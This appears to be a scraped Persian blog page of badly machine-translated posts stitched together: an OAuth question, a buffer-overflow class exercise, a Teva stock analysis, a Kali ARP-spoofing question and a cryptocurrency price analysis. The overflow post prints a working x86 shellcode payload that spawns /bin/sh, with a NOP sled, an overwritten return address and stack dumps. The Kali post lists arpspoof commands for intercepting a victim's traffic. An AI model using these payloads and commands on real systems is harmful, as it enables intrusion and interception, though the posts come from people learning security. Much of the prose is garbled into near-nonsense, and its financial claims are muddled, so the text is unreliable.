نوشته‌شده در

احراز هویت – چه نوع oauth نوع اعطا باید پس از ورود به سیستم اجتماعی استفاده کنید

من یک برنامه کاربردی دارم که دارای سرویس میکروسکوپ مخصوص خود است تا علامت های دسترسی را صادر کند. برای کاربران ثبت نام با استفاده از ایمیل و رمز عبور من از grant_type = 'password' استفاده می کنم. وقتی که یک کاربر در استفاده از رسانه های اجتماعی اقدام به ثبت نام می کند چه می شود؟

من فکر کردم که یک رمز عبور تصادفی برای دسترسی به نشانه های دسترسی ایجاد کنم، اما سرور oauth فقط کلمه عبور متن ساده را می پذیرد و من رمز ذخیره شده در هش ها را در db خود ذخیره می کنم. آیا باید برای استفاده از نشانه های مختلف از نوع دیگری استفاده کنم؟

نوشته‌شده در

سرریز بافر – shellcode تزریقی پس از دستورالعمل ترک خراب شده است

من یک سرریز بافر برای یک کلاس تمرین می کنم و من یک تکه کد دارم که از یک سیستم منبع باز قرض گرفتم. متاسفانه من نمی توانم این کد را فاش کنم.

اطلاعات سیستم من: 

 nikel $ uname -a
لینوکس اوبونتو 4.15.0-29-عمومی # 31 ~ 16.04.1-اوبونتو SMP جمعه 18 ژوئیه 10:19:08 UTC 2018 i686 i686 i686 گنو / لینوکس

من از gdbgui برای اشکالزدایی که از طریق pip نصب کردم استفاده میکنم. این نسخه گرافیکی از gdb است. 

 nikel $ gdbgui --version
0.13.0.0

بافر من سرشار است، buf اعلام شده حاوی 128 بایت و در 0xbfffe928 وجود دارد. مقادیر به صورت زیر با آرایه اضافه می شوند: buf [len++]، جایی که len در 0xbfffe9a8 است. آدرس برگشت در 0xbfffe9bc .

این شل کد است که من تزریق می کنم: 

 " x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x31  xc0  x50  x68  x2f  x2f  x73  x68  x68  x2f  x62  x69  x6e  x89  xe3  x50  x89  xe2  x53  x89  xe1  xb0  x0b  xcd  x80  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x94  x28  xe9  xff  xbf "

در shellcode:

  1. هدف شلختگی، راه اندازی پوسته سیستم / bin / sh است. من آن را مستقیما از https://dhavalkapil.com/blogs/Shellcode-Injection/
  2. x94 کپی کردم که در انتهای آن قرار داده ام، چون آدرسهای حافظه را پر میکنم و به طور مستقیم نوشتن در آدرس بازگشت است که در 0xbfffe9bc .
  3. باز " لازم است که وارد عمل تضعیف شده و بسته شدن " لازم است از این تابع
  4. من فایل را با استفاده از vim -b ویرایش کرده ام و آن را به عنوان یک فایل .bin ذخیره کردم.

این حالت پشته درست قبل از ترک دستورالعمل: 

 0xbfffe928: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe930: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe938: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe940: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe948: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe950: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe958: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe960: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe968: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe970: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe978: 0x31 0xc0 0x50 0x68 0x2f 0x2f 0x73 0x68
0xbfffe980: 0x68 0x2f 0x62 0x69 0x6e 0x89 0xe3 0x50
0xbfffe988: 0x89 0xe2 0x53 0x89 0xe1 0xb0 0x0b 0xcd
0xbfffe990: 0x80 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe998: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe9a0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe9a8: 0x99 0x00 0x00 0x00 0x22 0x00 0x00 0x00
0xbfffe9b0: 0xf0 0xef 0xff 0xbf 0x70 0xc1 0x05 0x08
0xbfffe9b8: 0xe8 0xe9 0xff 0xbf 0x28 0xe9 0xff 0xbf

این پشته پس از ترک دستورالعمل: 

 0xbfffe928: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe930: 0x90 0x90 0x90 0x90 0x00 0x00 0x00 0x00
0xbfffe938: 0x00 0x37 0xdb 0xb7 0x00 0x00 0x00 0x00
0xbfffe940: 0xa0 0xe5 0xe1 0xb7 0x00 0x00 0x00 0x00
0xbfffe948: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe950: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe958: 0xa9 0xf8 0xe1 0xb7 0x00 0x60 0xf6 0xb7
0xbfffe960: 0x00 0x60 0xf6 0xb7 0x00 0x60 0xf6 0xb7
0xbfffe968: 0x8c 0xe9 0xff 0xbf 0xd6 0xfc 0xe1 0xb7
0xbfffe970: 0x01 0x00 0x00 0x00 0x90 0x90 0x90 0x90
0xbfffe978: 0x6b 0x1e 0xe1 0xb7 0x70 0xc1 0x05 0x08
0xbfffe980: 0x00 0x60 0xf6 0xb7 0xc6 0xfc 0xe1 0xb7
0xbfffe988: 0x70 0xc1 0x05 0x08 0xaf 0xe9 0xff 0xbf
0xbfffe990: 0x00 0x00 0x00 0x00 0x90 0x90 0x90 0x90
0xbfffe998: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe9a0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe9a8: 0x99 0x00 0x00 0x00 0x22 0x00 0x00 0xcc
0xbfffe9b0: 0xf0 0xef 0xff 0xbf 0x70 0xc1 0x05 0x08
0xbfffe9b8: 0xe8 0xe9 0xff 0xbf 0x28 0xe9 0xff 0xbf

من نمی فهمم که چرا فضای حافظه buf خراب شده است. اگر برنامه را اجرا کنم، این خطا را به من می دهد: 

 برنامه
 دریافت سیگنال SIGSEGV، گسل Segmentation.
0xbfffe928 در ؟؟ ()

EIP دارای مقدار 0xbfffe928 است که صحیح است. gdb می گوید نمی تواند به آدرس 0xbfffe928 دسترسی پیدا کند

نوشته‌شده در

پرکردن به روز رسانی: سکه های جلو و عقب پس از قوی گزاف گویی

توسط Dmitriy Gurkovskiy، تحلیلگر ارشد در RoboMarkets

بازار گاو نر آن سخت تر به کسب سود خوبی در قیمت سهم رهبران صنعت ساخته شده است. قیمت بالا در حال حاضر، و ممکن است شروع به اصلاح در هر لحظه. روز به روز است شایعات درباره گسترش بحران و چنین بحران معمولا در پاییز که با سابقه 20 ساله آخرین تایید کرد انتظار می رود. مدعاست: بحران dotcom در اوایل سپتامبر 2000 با بازار رسیدن به آن تنها دو سال بعد آغاز شده.

مورد دیگر در اواسط سپتامبر 2007 آغاز شده و تبديل به بحران جهانی در اوت 2008. با این حال، بازار رسیده آن کم پایین و شروع دیر، دوره نقاهت در 2009. در همین حال، برخی از بازیکنان را هنوز زندگی می گذشته و در انتظار بازار برای بستن هر روز، بدون توجه به دستاوردهای قابل توجهی است که در طول سال ساخته شده است.

7 سال بین dotcom و بحران های مالی وجود دارد. کاهش عمده بعدی در اوت سال 2015 رخ داد اما آن کوتاه بود و در بحران عمده منتج نمی شود. در 3 سال بیشتر تهمت شد رئیس جمهور ایالات متحده و آغاز حل مسئله تعادل منفی تجارت توسط تحمیل گمرکی در چین. این، همراه با اصلاحات مالیاتی بازار زیادی پشتیبانی و در حال رشد می رفت. با این حال، وضعیت است که نه، هم منقبض و پاییز آینده به تنهایی ممکن است منجر به سرمایه گذاران به جای نگران بودن است. شرکت اوج تاریخی درآمد خود را هر ماهه آمار و این ممکن است مدیریت احساس سرگیجه شوید.

با این حال، شرکت های است که بر خلاف بسیاری از همتایان خود رشد نمی کنند پس از انتخابات تهمت وجود دارد. یکی از آنها است محدود صنایع دارویی تیوا (NYSE: تیوا ). هنگامی که بازار شروع به رشد پس از انتخابات ایالات متحده تیوا رفتن به شدت, نهایت بیش از 80% در طول 2 سال از دست دادن آغاز شده است. شرکت شروع به داشتن مشکل در زمانی که آنها خریداری Allergan 2016 (NYSE: طعمه ) که ب 40.5 دلار در حالی که بدهی در حداقل بوده قبل از آن، سرمايه تیوا پیوسته از سال 2006، رشد بود.

پس تیوا Allergan را به دست آورد، بدهی که selloff بلافاصله موجب شدت بالاتر رفت. در عین حال درآمد نیز سقوط شروع.

همانطور که قیمت سهام اول بود نه خیلی حرکت می کند، و سپس حمایت حتی درآمد سه ماهه در سال 2016 به اندازه کافی برای سرمایه گذاران نبودند که $50.00 در وسط سال و بیشتر رفت.

چشم انداز نا امید کننده، است و حتی مورد معامله سهام این فکر می کنم اما هنوز هم برخی از چیزهایی که یکی هم باید در نظر وجود دارد.

چندین سال پیش، بسیاری از مردم در سمت کشور زندگی می کردند و یا دست کم به صرف برخی از زمان وجود دارد استفاده می شود، و چند چیز مانند آلرژی شنیده. سپس، با این حال، مردم مهاجرت به شهرها که بسیار آلوده شروع. این شاید منجر به دو آلرژی امروزه بسیار گسترده شده. آلرژی می تواند بسیار خطرناک است، همانطور که در بسیاری از موارد آن شوک آلرژیک با بیمار به معنای واقعی کلمه معلق بین مرگ و زندگی تحریک ممکن است. در این مورد تنها چیزی که آنها نیاز به دارو است که کمک خواهد کرد که آنها برای زنده ماندن قبل از آمبولانس وارد است.

این دقیقا چه ایجاد محدود صنایع دارویی تیوا EpiPen پزشکی است که حذف شوک آلرژیک ناشی از گزش حشرات، غذا، دیگر دارو و فعالیت فیزیکی است. تزریق EpiPen به اندازه کافی برای تحریک سیستم قلب و عروق و تنفس ارگان که مانع از عواقب ناشی از شوک آلرژیک است.

به گفته برخی از منابع در ایالات متحده، حدود 43 m افرادی که وجود دارد از شوک آلرژیک هر لحظه ممکن است رنج می برند و باید مانند پزشکی که دست. گاهی اوقات یکی نیست به اندازه کافی ممکن است ایده آل، یک فرد به دوز 2 EpiPen، کردم. در حالی که رقابت در حال تلاش برای ایجاد همان طب آدرنالین است که باید آن را بسیار ارزان تر را با استفاده از این دو دوز در حدود 375, هزینه. هنوز, آنها با آزمایش های پزشکی که به معنی EpiPen است هیچ رقابت در حال حاضر با داشتن مشکلات. نکته دیگر که آن باید استفاده می شود در مدت 12 ماه است. در غیر این صورت، شما باید برای خرید از دوز. این به ارمغان می آورد سود پایدار, جنبه اخلاقی به دور گرفته شده است.

محدود صنایع دارویی تیوا شرکت چند ملیتی با 66 گیاهان در 60 کشور جهان است. این یکی از بزرگترین شرکت داروسازی وجود است و تعجبی ندارد که وارن بافت پرداخت توجه به آن است. در Q2، شرکت شرط بندی از تیوا افزایش سهام دو 4.3% یا 2 7 m سهام، و یکی از سه سهامداران در حال حاضر است.

در همین حال، در نوامبر 2017 مدیر عامل جدید به تیوا بود. بچه ها شولتز هزینه به شدت کاهش می یابد و در نتیجه، بدهی اول در حال رشد را متوقف کرده و سپس توسط بیش از $10B کاهش می یابد.

مشخصات فنی, روند نزولی به اتمام است و حرکت صعودی ممکن است در میان دوره ای، با پشتیبانی واقع بودن در $20.00 شروع.

سلب مسئولیت

هر پیش بینی مندرج در نظر نویسندگان خاص بر اساس. این تحلیل باید به عنوان مشاوره بازرگانی درمان نشود. Roboforex نه مسئول نتایج معاملات ناشی از با تکیه بر تجارت توصیه ها و نظرات موجود در اینجا برگزار شد.

فیلترشکن پرسرعت

نوشته‌شده در

کالی لینوکس – اتصال به اینترنت به آرامی پس از آپدیت کردن

پس از تمرین کردن arpspoofing خودم اتصال اینترنت من در غیر قابل تحمل کند بیشتر، اما نه تمام دستگاه های من. من همه چیز را تعطیل کردم و دوباره تلاش کردم تا همه چیز را دوباره پرورش دهم، اما هنوز مشکلی مشابه وجود دارد.

این سناریو است:
مهاجم: Kali لینوکس بر روی تمشک من اجرا می شود
قربانی: MacBook Pro من در حال اجرا سیستم عامل مک

من از دستورات در این دستور استفاده کردم:
1.) echo 1> / proc / sys / net / ipv4 / ip_forward
2) cat / proc / sys / net / ipv4 / ip_forward (verified = 1)
3) arpspoof -i wlan0 -t 192.168.1.5 192.168.1.1
4) arpspoof -i wlan0 -t 192.168.1.1 192.168.1.5

پس از عیب یابی و پیدا کردن یک صفحه در اینجا که گفتم باید IPTABLES را اضافه کنم سعی کردم مبادله مراحل 3 و 4 با:

3.) arpspoof – من wlan0 -t 192.168.1.5 -r 192.168.1.1
4) arpspoof -i wlan0 -t 192.168.1.1 192.168.1.5

با این حال، هیچ چیز به طور کامل مشکل را حل نمی کند هر گونه کمک به دانش آموز infosec بسیار سپاسگزارم!

نوشته‌شده در

Bitcoin قیمت چشم بازیابی پس از گاو تصریح کلید پشتیبانی

دیروز را هشدار پیشرو دیگری پا پایین تر در بازار خرس مداوم در cryptocurrency کاهش یافته علائم بار دیگر، به عنوان چند altcoins های بزرگ درست ثابت زیر خود را پایین اوت بخش. Ethereum laggard قابل توجه ترین رقم دو برابر از دست دادن و شکستن زیر سطح کلید 180 $ برای اولین بار از ژوئیه 2017 است.

Bitcoin خوب دوباره برگزار شد، و آن را هنوز هم حرکت دادن اطراف سطح 6275 $ است که در مرکز توجه تقریبا یک هفته در حال حاضر شده است. واگرایی قوی بین BTC و بقیه بازار ادامه داد، با سهم بازار سکه بزرگترین سطح 58 درصد به عنوان altcoins سقوط کرد در سراسر هیئت مدیره نقض.

XMR/USDT، 4 ساعته نمودار تحلیل

اگر چه ارتباط هنوز هم آسمان بالا و نوسانات بالاتر. شروع به پریدن کرد انتظار می رود، وجود دارد نیز مثبت بعضی علائم در حال حاضر علاوه بر ثبات Bitcoin است. مدیریت موج دار شدن به پایین با وجود ضعف نسبی بالا اوت Monero هنوز هم بالاتر از بازار خرس مربوطه آن کم است و یوتا داش EOS و ستاره ای نیز میان نگرانی نظارتی در حال برگزاری.

که تمام ارزهای اصلی هنوز هستند در کوتاه مدت فروش سیگنال در مدل ما روند ، گفت، و s روند نزولی بلند مدت هستند نیز به وضوح دست نخورده، بنابراین معامله گران باید موقعیت های جدید را در اینجا وارد کنید.

BTC/دلار 4 ساعته نمودار تجزیه و تحلیل

Bitcoin همچنان در محدوده میان selloff وسیع تجارت و سکه هنوز هم بسیار نزدیک به $6275, بدون نقض کم از هفته گذشته معامله می شود. عدم حرکت نزولی حرکت بزرگ است به علاوه برای پرکردن گاو در اینجا به عنوان شانس رزمی برگزاری منطقه $5850 بسیار مهم است افزایش، حتی در حالی که test پشتیبانی که هنوز هم به احتمال زیاد در هفته آینده است.

با توجه به آن، معامله گران باید با باز کردن پوزیشن های جدید حتی در سکه نسبتا قوی تا زمانی که تایید تغییر روند کوتاه مدت صبر کنید. علاوه بر این، پشتیبانی ضعیف تر یخ صندوق نزدیک $6000, در حالی که یخ resistnace پیش که $6500، $6750، و نزدیک به 7000 $.

همه چشم در Ethereum پس از شکست

ETH/دلار 4 ساعته نمودار تحلیل

با وجود بزرگ بدون بار از ماه های اخیر و عدم معنی دار جریان حرکت می کند Ethereum را هنوز هم در روند نزولی کوتاه مدت روشن بدون نشانه های قریب الوقوع است پایین. فروش فشار آشکار است و که امتیاز به test احتمال بعدی اصلی منطقه بین $155 و 160 دلار با مقاومت، هم جلو آن 180 $200 $ و 235 $ پشتیبانی. ETH رهبر روشن در selloff اخیر بوده است، تا سیگنال کوتاه مدت تر و مهم تر در هفته آینده دریافت کنید برگشت تجمع گسترده بخش عمده باعث می تواند.

XRP/USDT، 4 ساعته نمودار تجزیه و تحلیل

موج دار شدن کمی تغییر نسبت به قیمت دیروز به عنوان خریداران سکه بالا پایین اوت با وجود فروش قوی در بخش برگزار شد. سکه هنوز احتمال را از کم است اما بازیابی سریع بالای آن می تواند پایین تر با دوام را راه اندازی. که ما مدل روند هنوز در سیگنال فروش در هر دو چارچوب های زمانی است، گفت، و معامله گران باید موقعیت در اینجا وارد کنید. مقاومت است که هنوز هم پیش که $0.30، $0.313، و $0.32، در حالی که حمایت که 0.23 یافت.

LTC/دلار آمریکا، 4 ساعته نمودار تجزیه و تحلیل

Litecoin ضعف نسبی اخیر تایید و زیر 50 دلار و حداقل اوت ضربه کم 12 ماه جدید در این فرآیند سقوط. سکه تایید ادامه روند نزولی گسترده و در حال حاضر رهبری برای test بعد منطقه عمده پشتیبانی نزدیک سطح 44 دلار محتمل است. معامله گران باید به ماندن سکه مقاومت کلیدی مناطق هم اکنون پیش رو نزدیک $51 و 56 دلار هنوز.

تصویر برجسته از Shutterstock

سلب مسئولیت: تحلیلگر صاحب cryptocurrencies. او دارای سرمایه گذاری در سکه ها موقعیت اما در کوتاه مدت و یا معامله در روز درگیر می کند و او را نگه ندارد موقعیت های کوتاه مدت را در هر یک از سکه ها.

فیلترشکن پرسرعت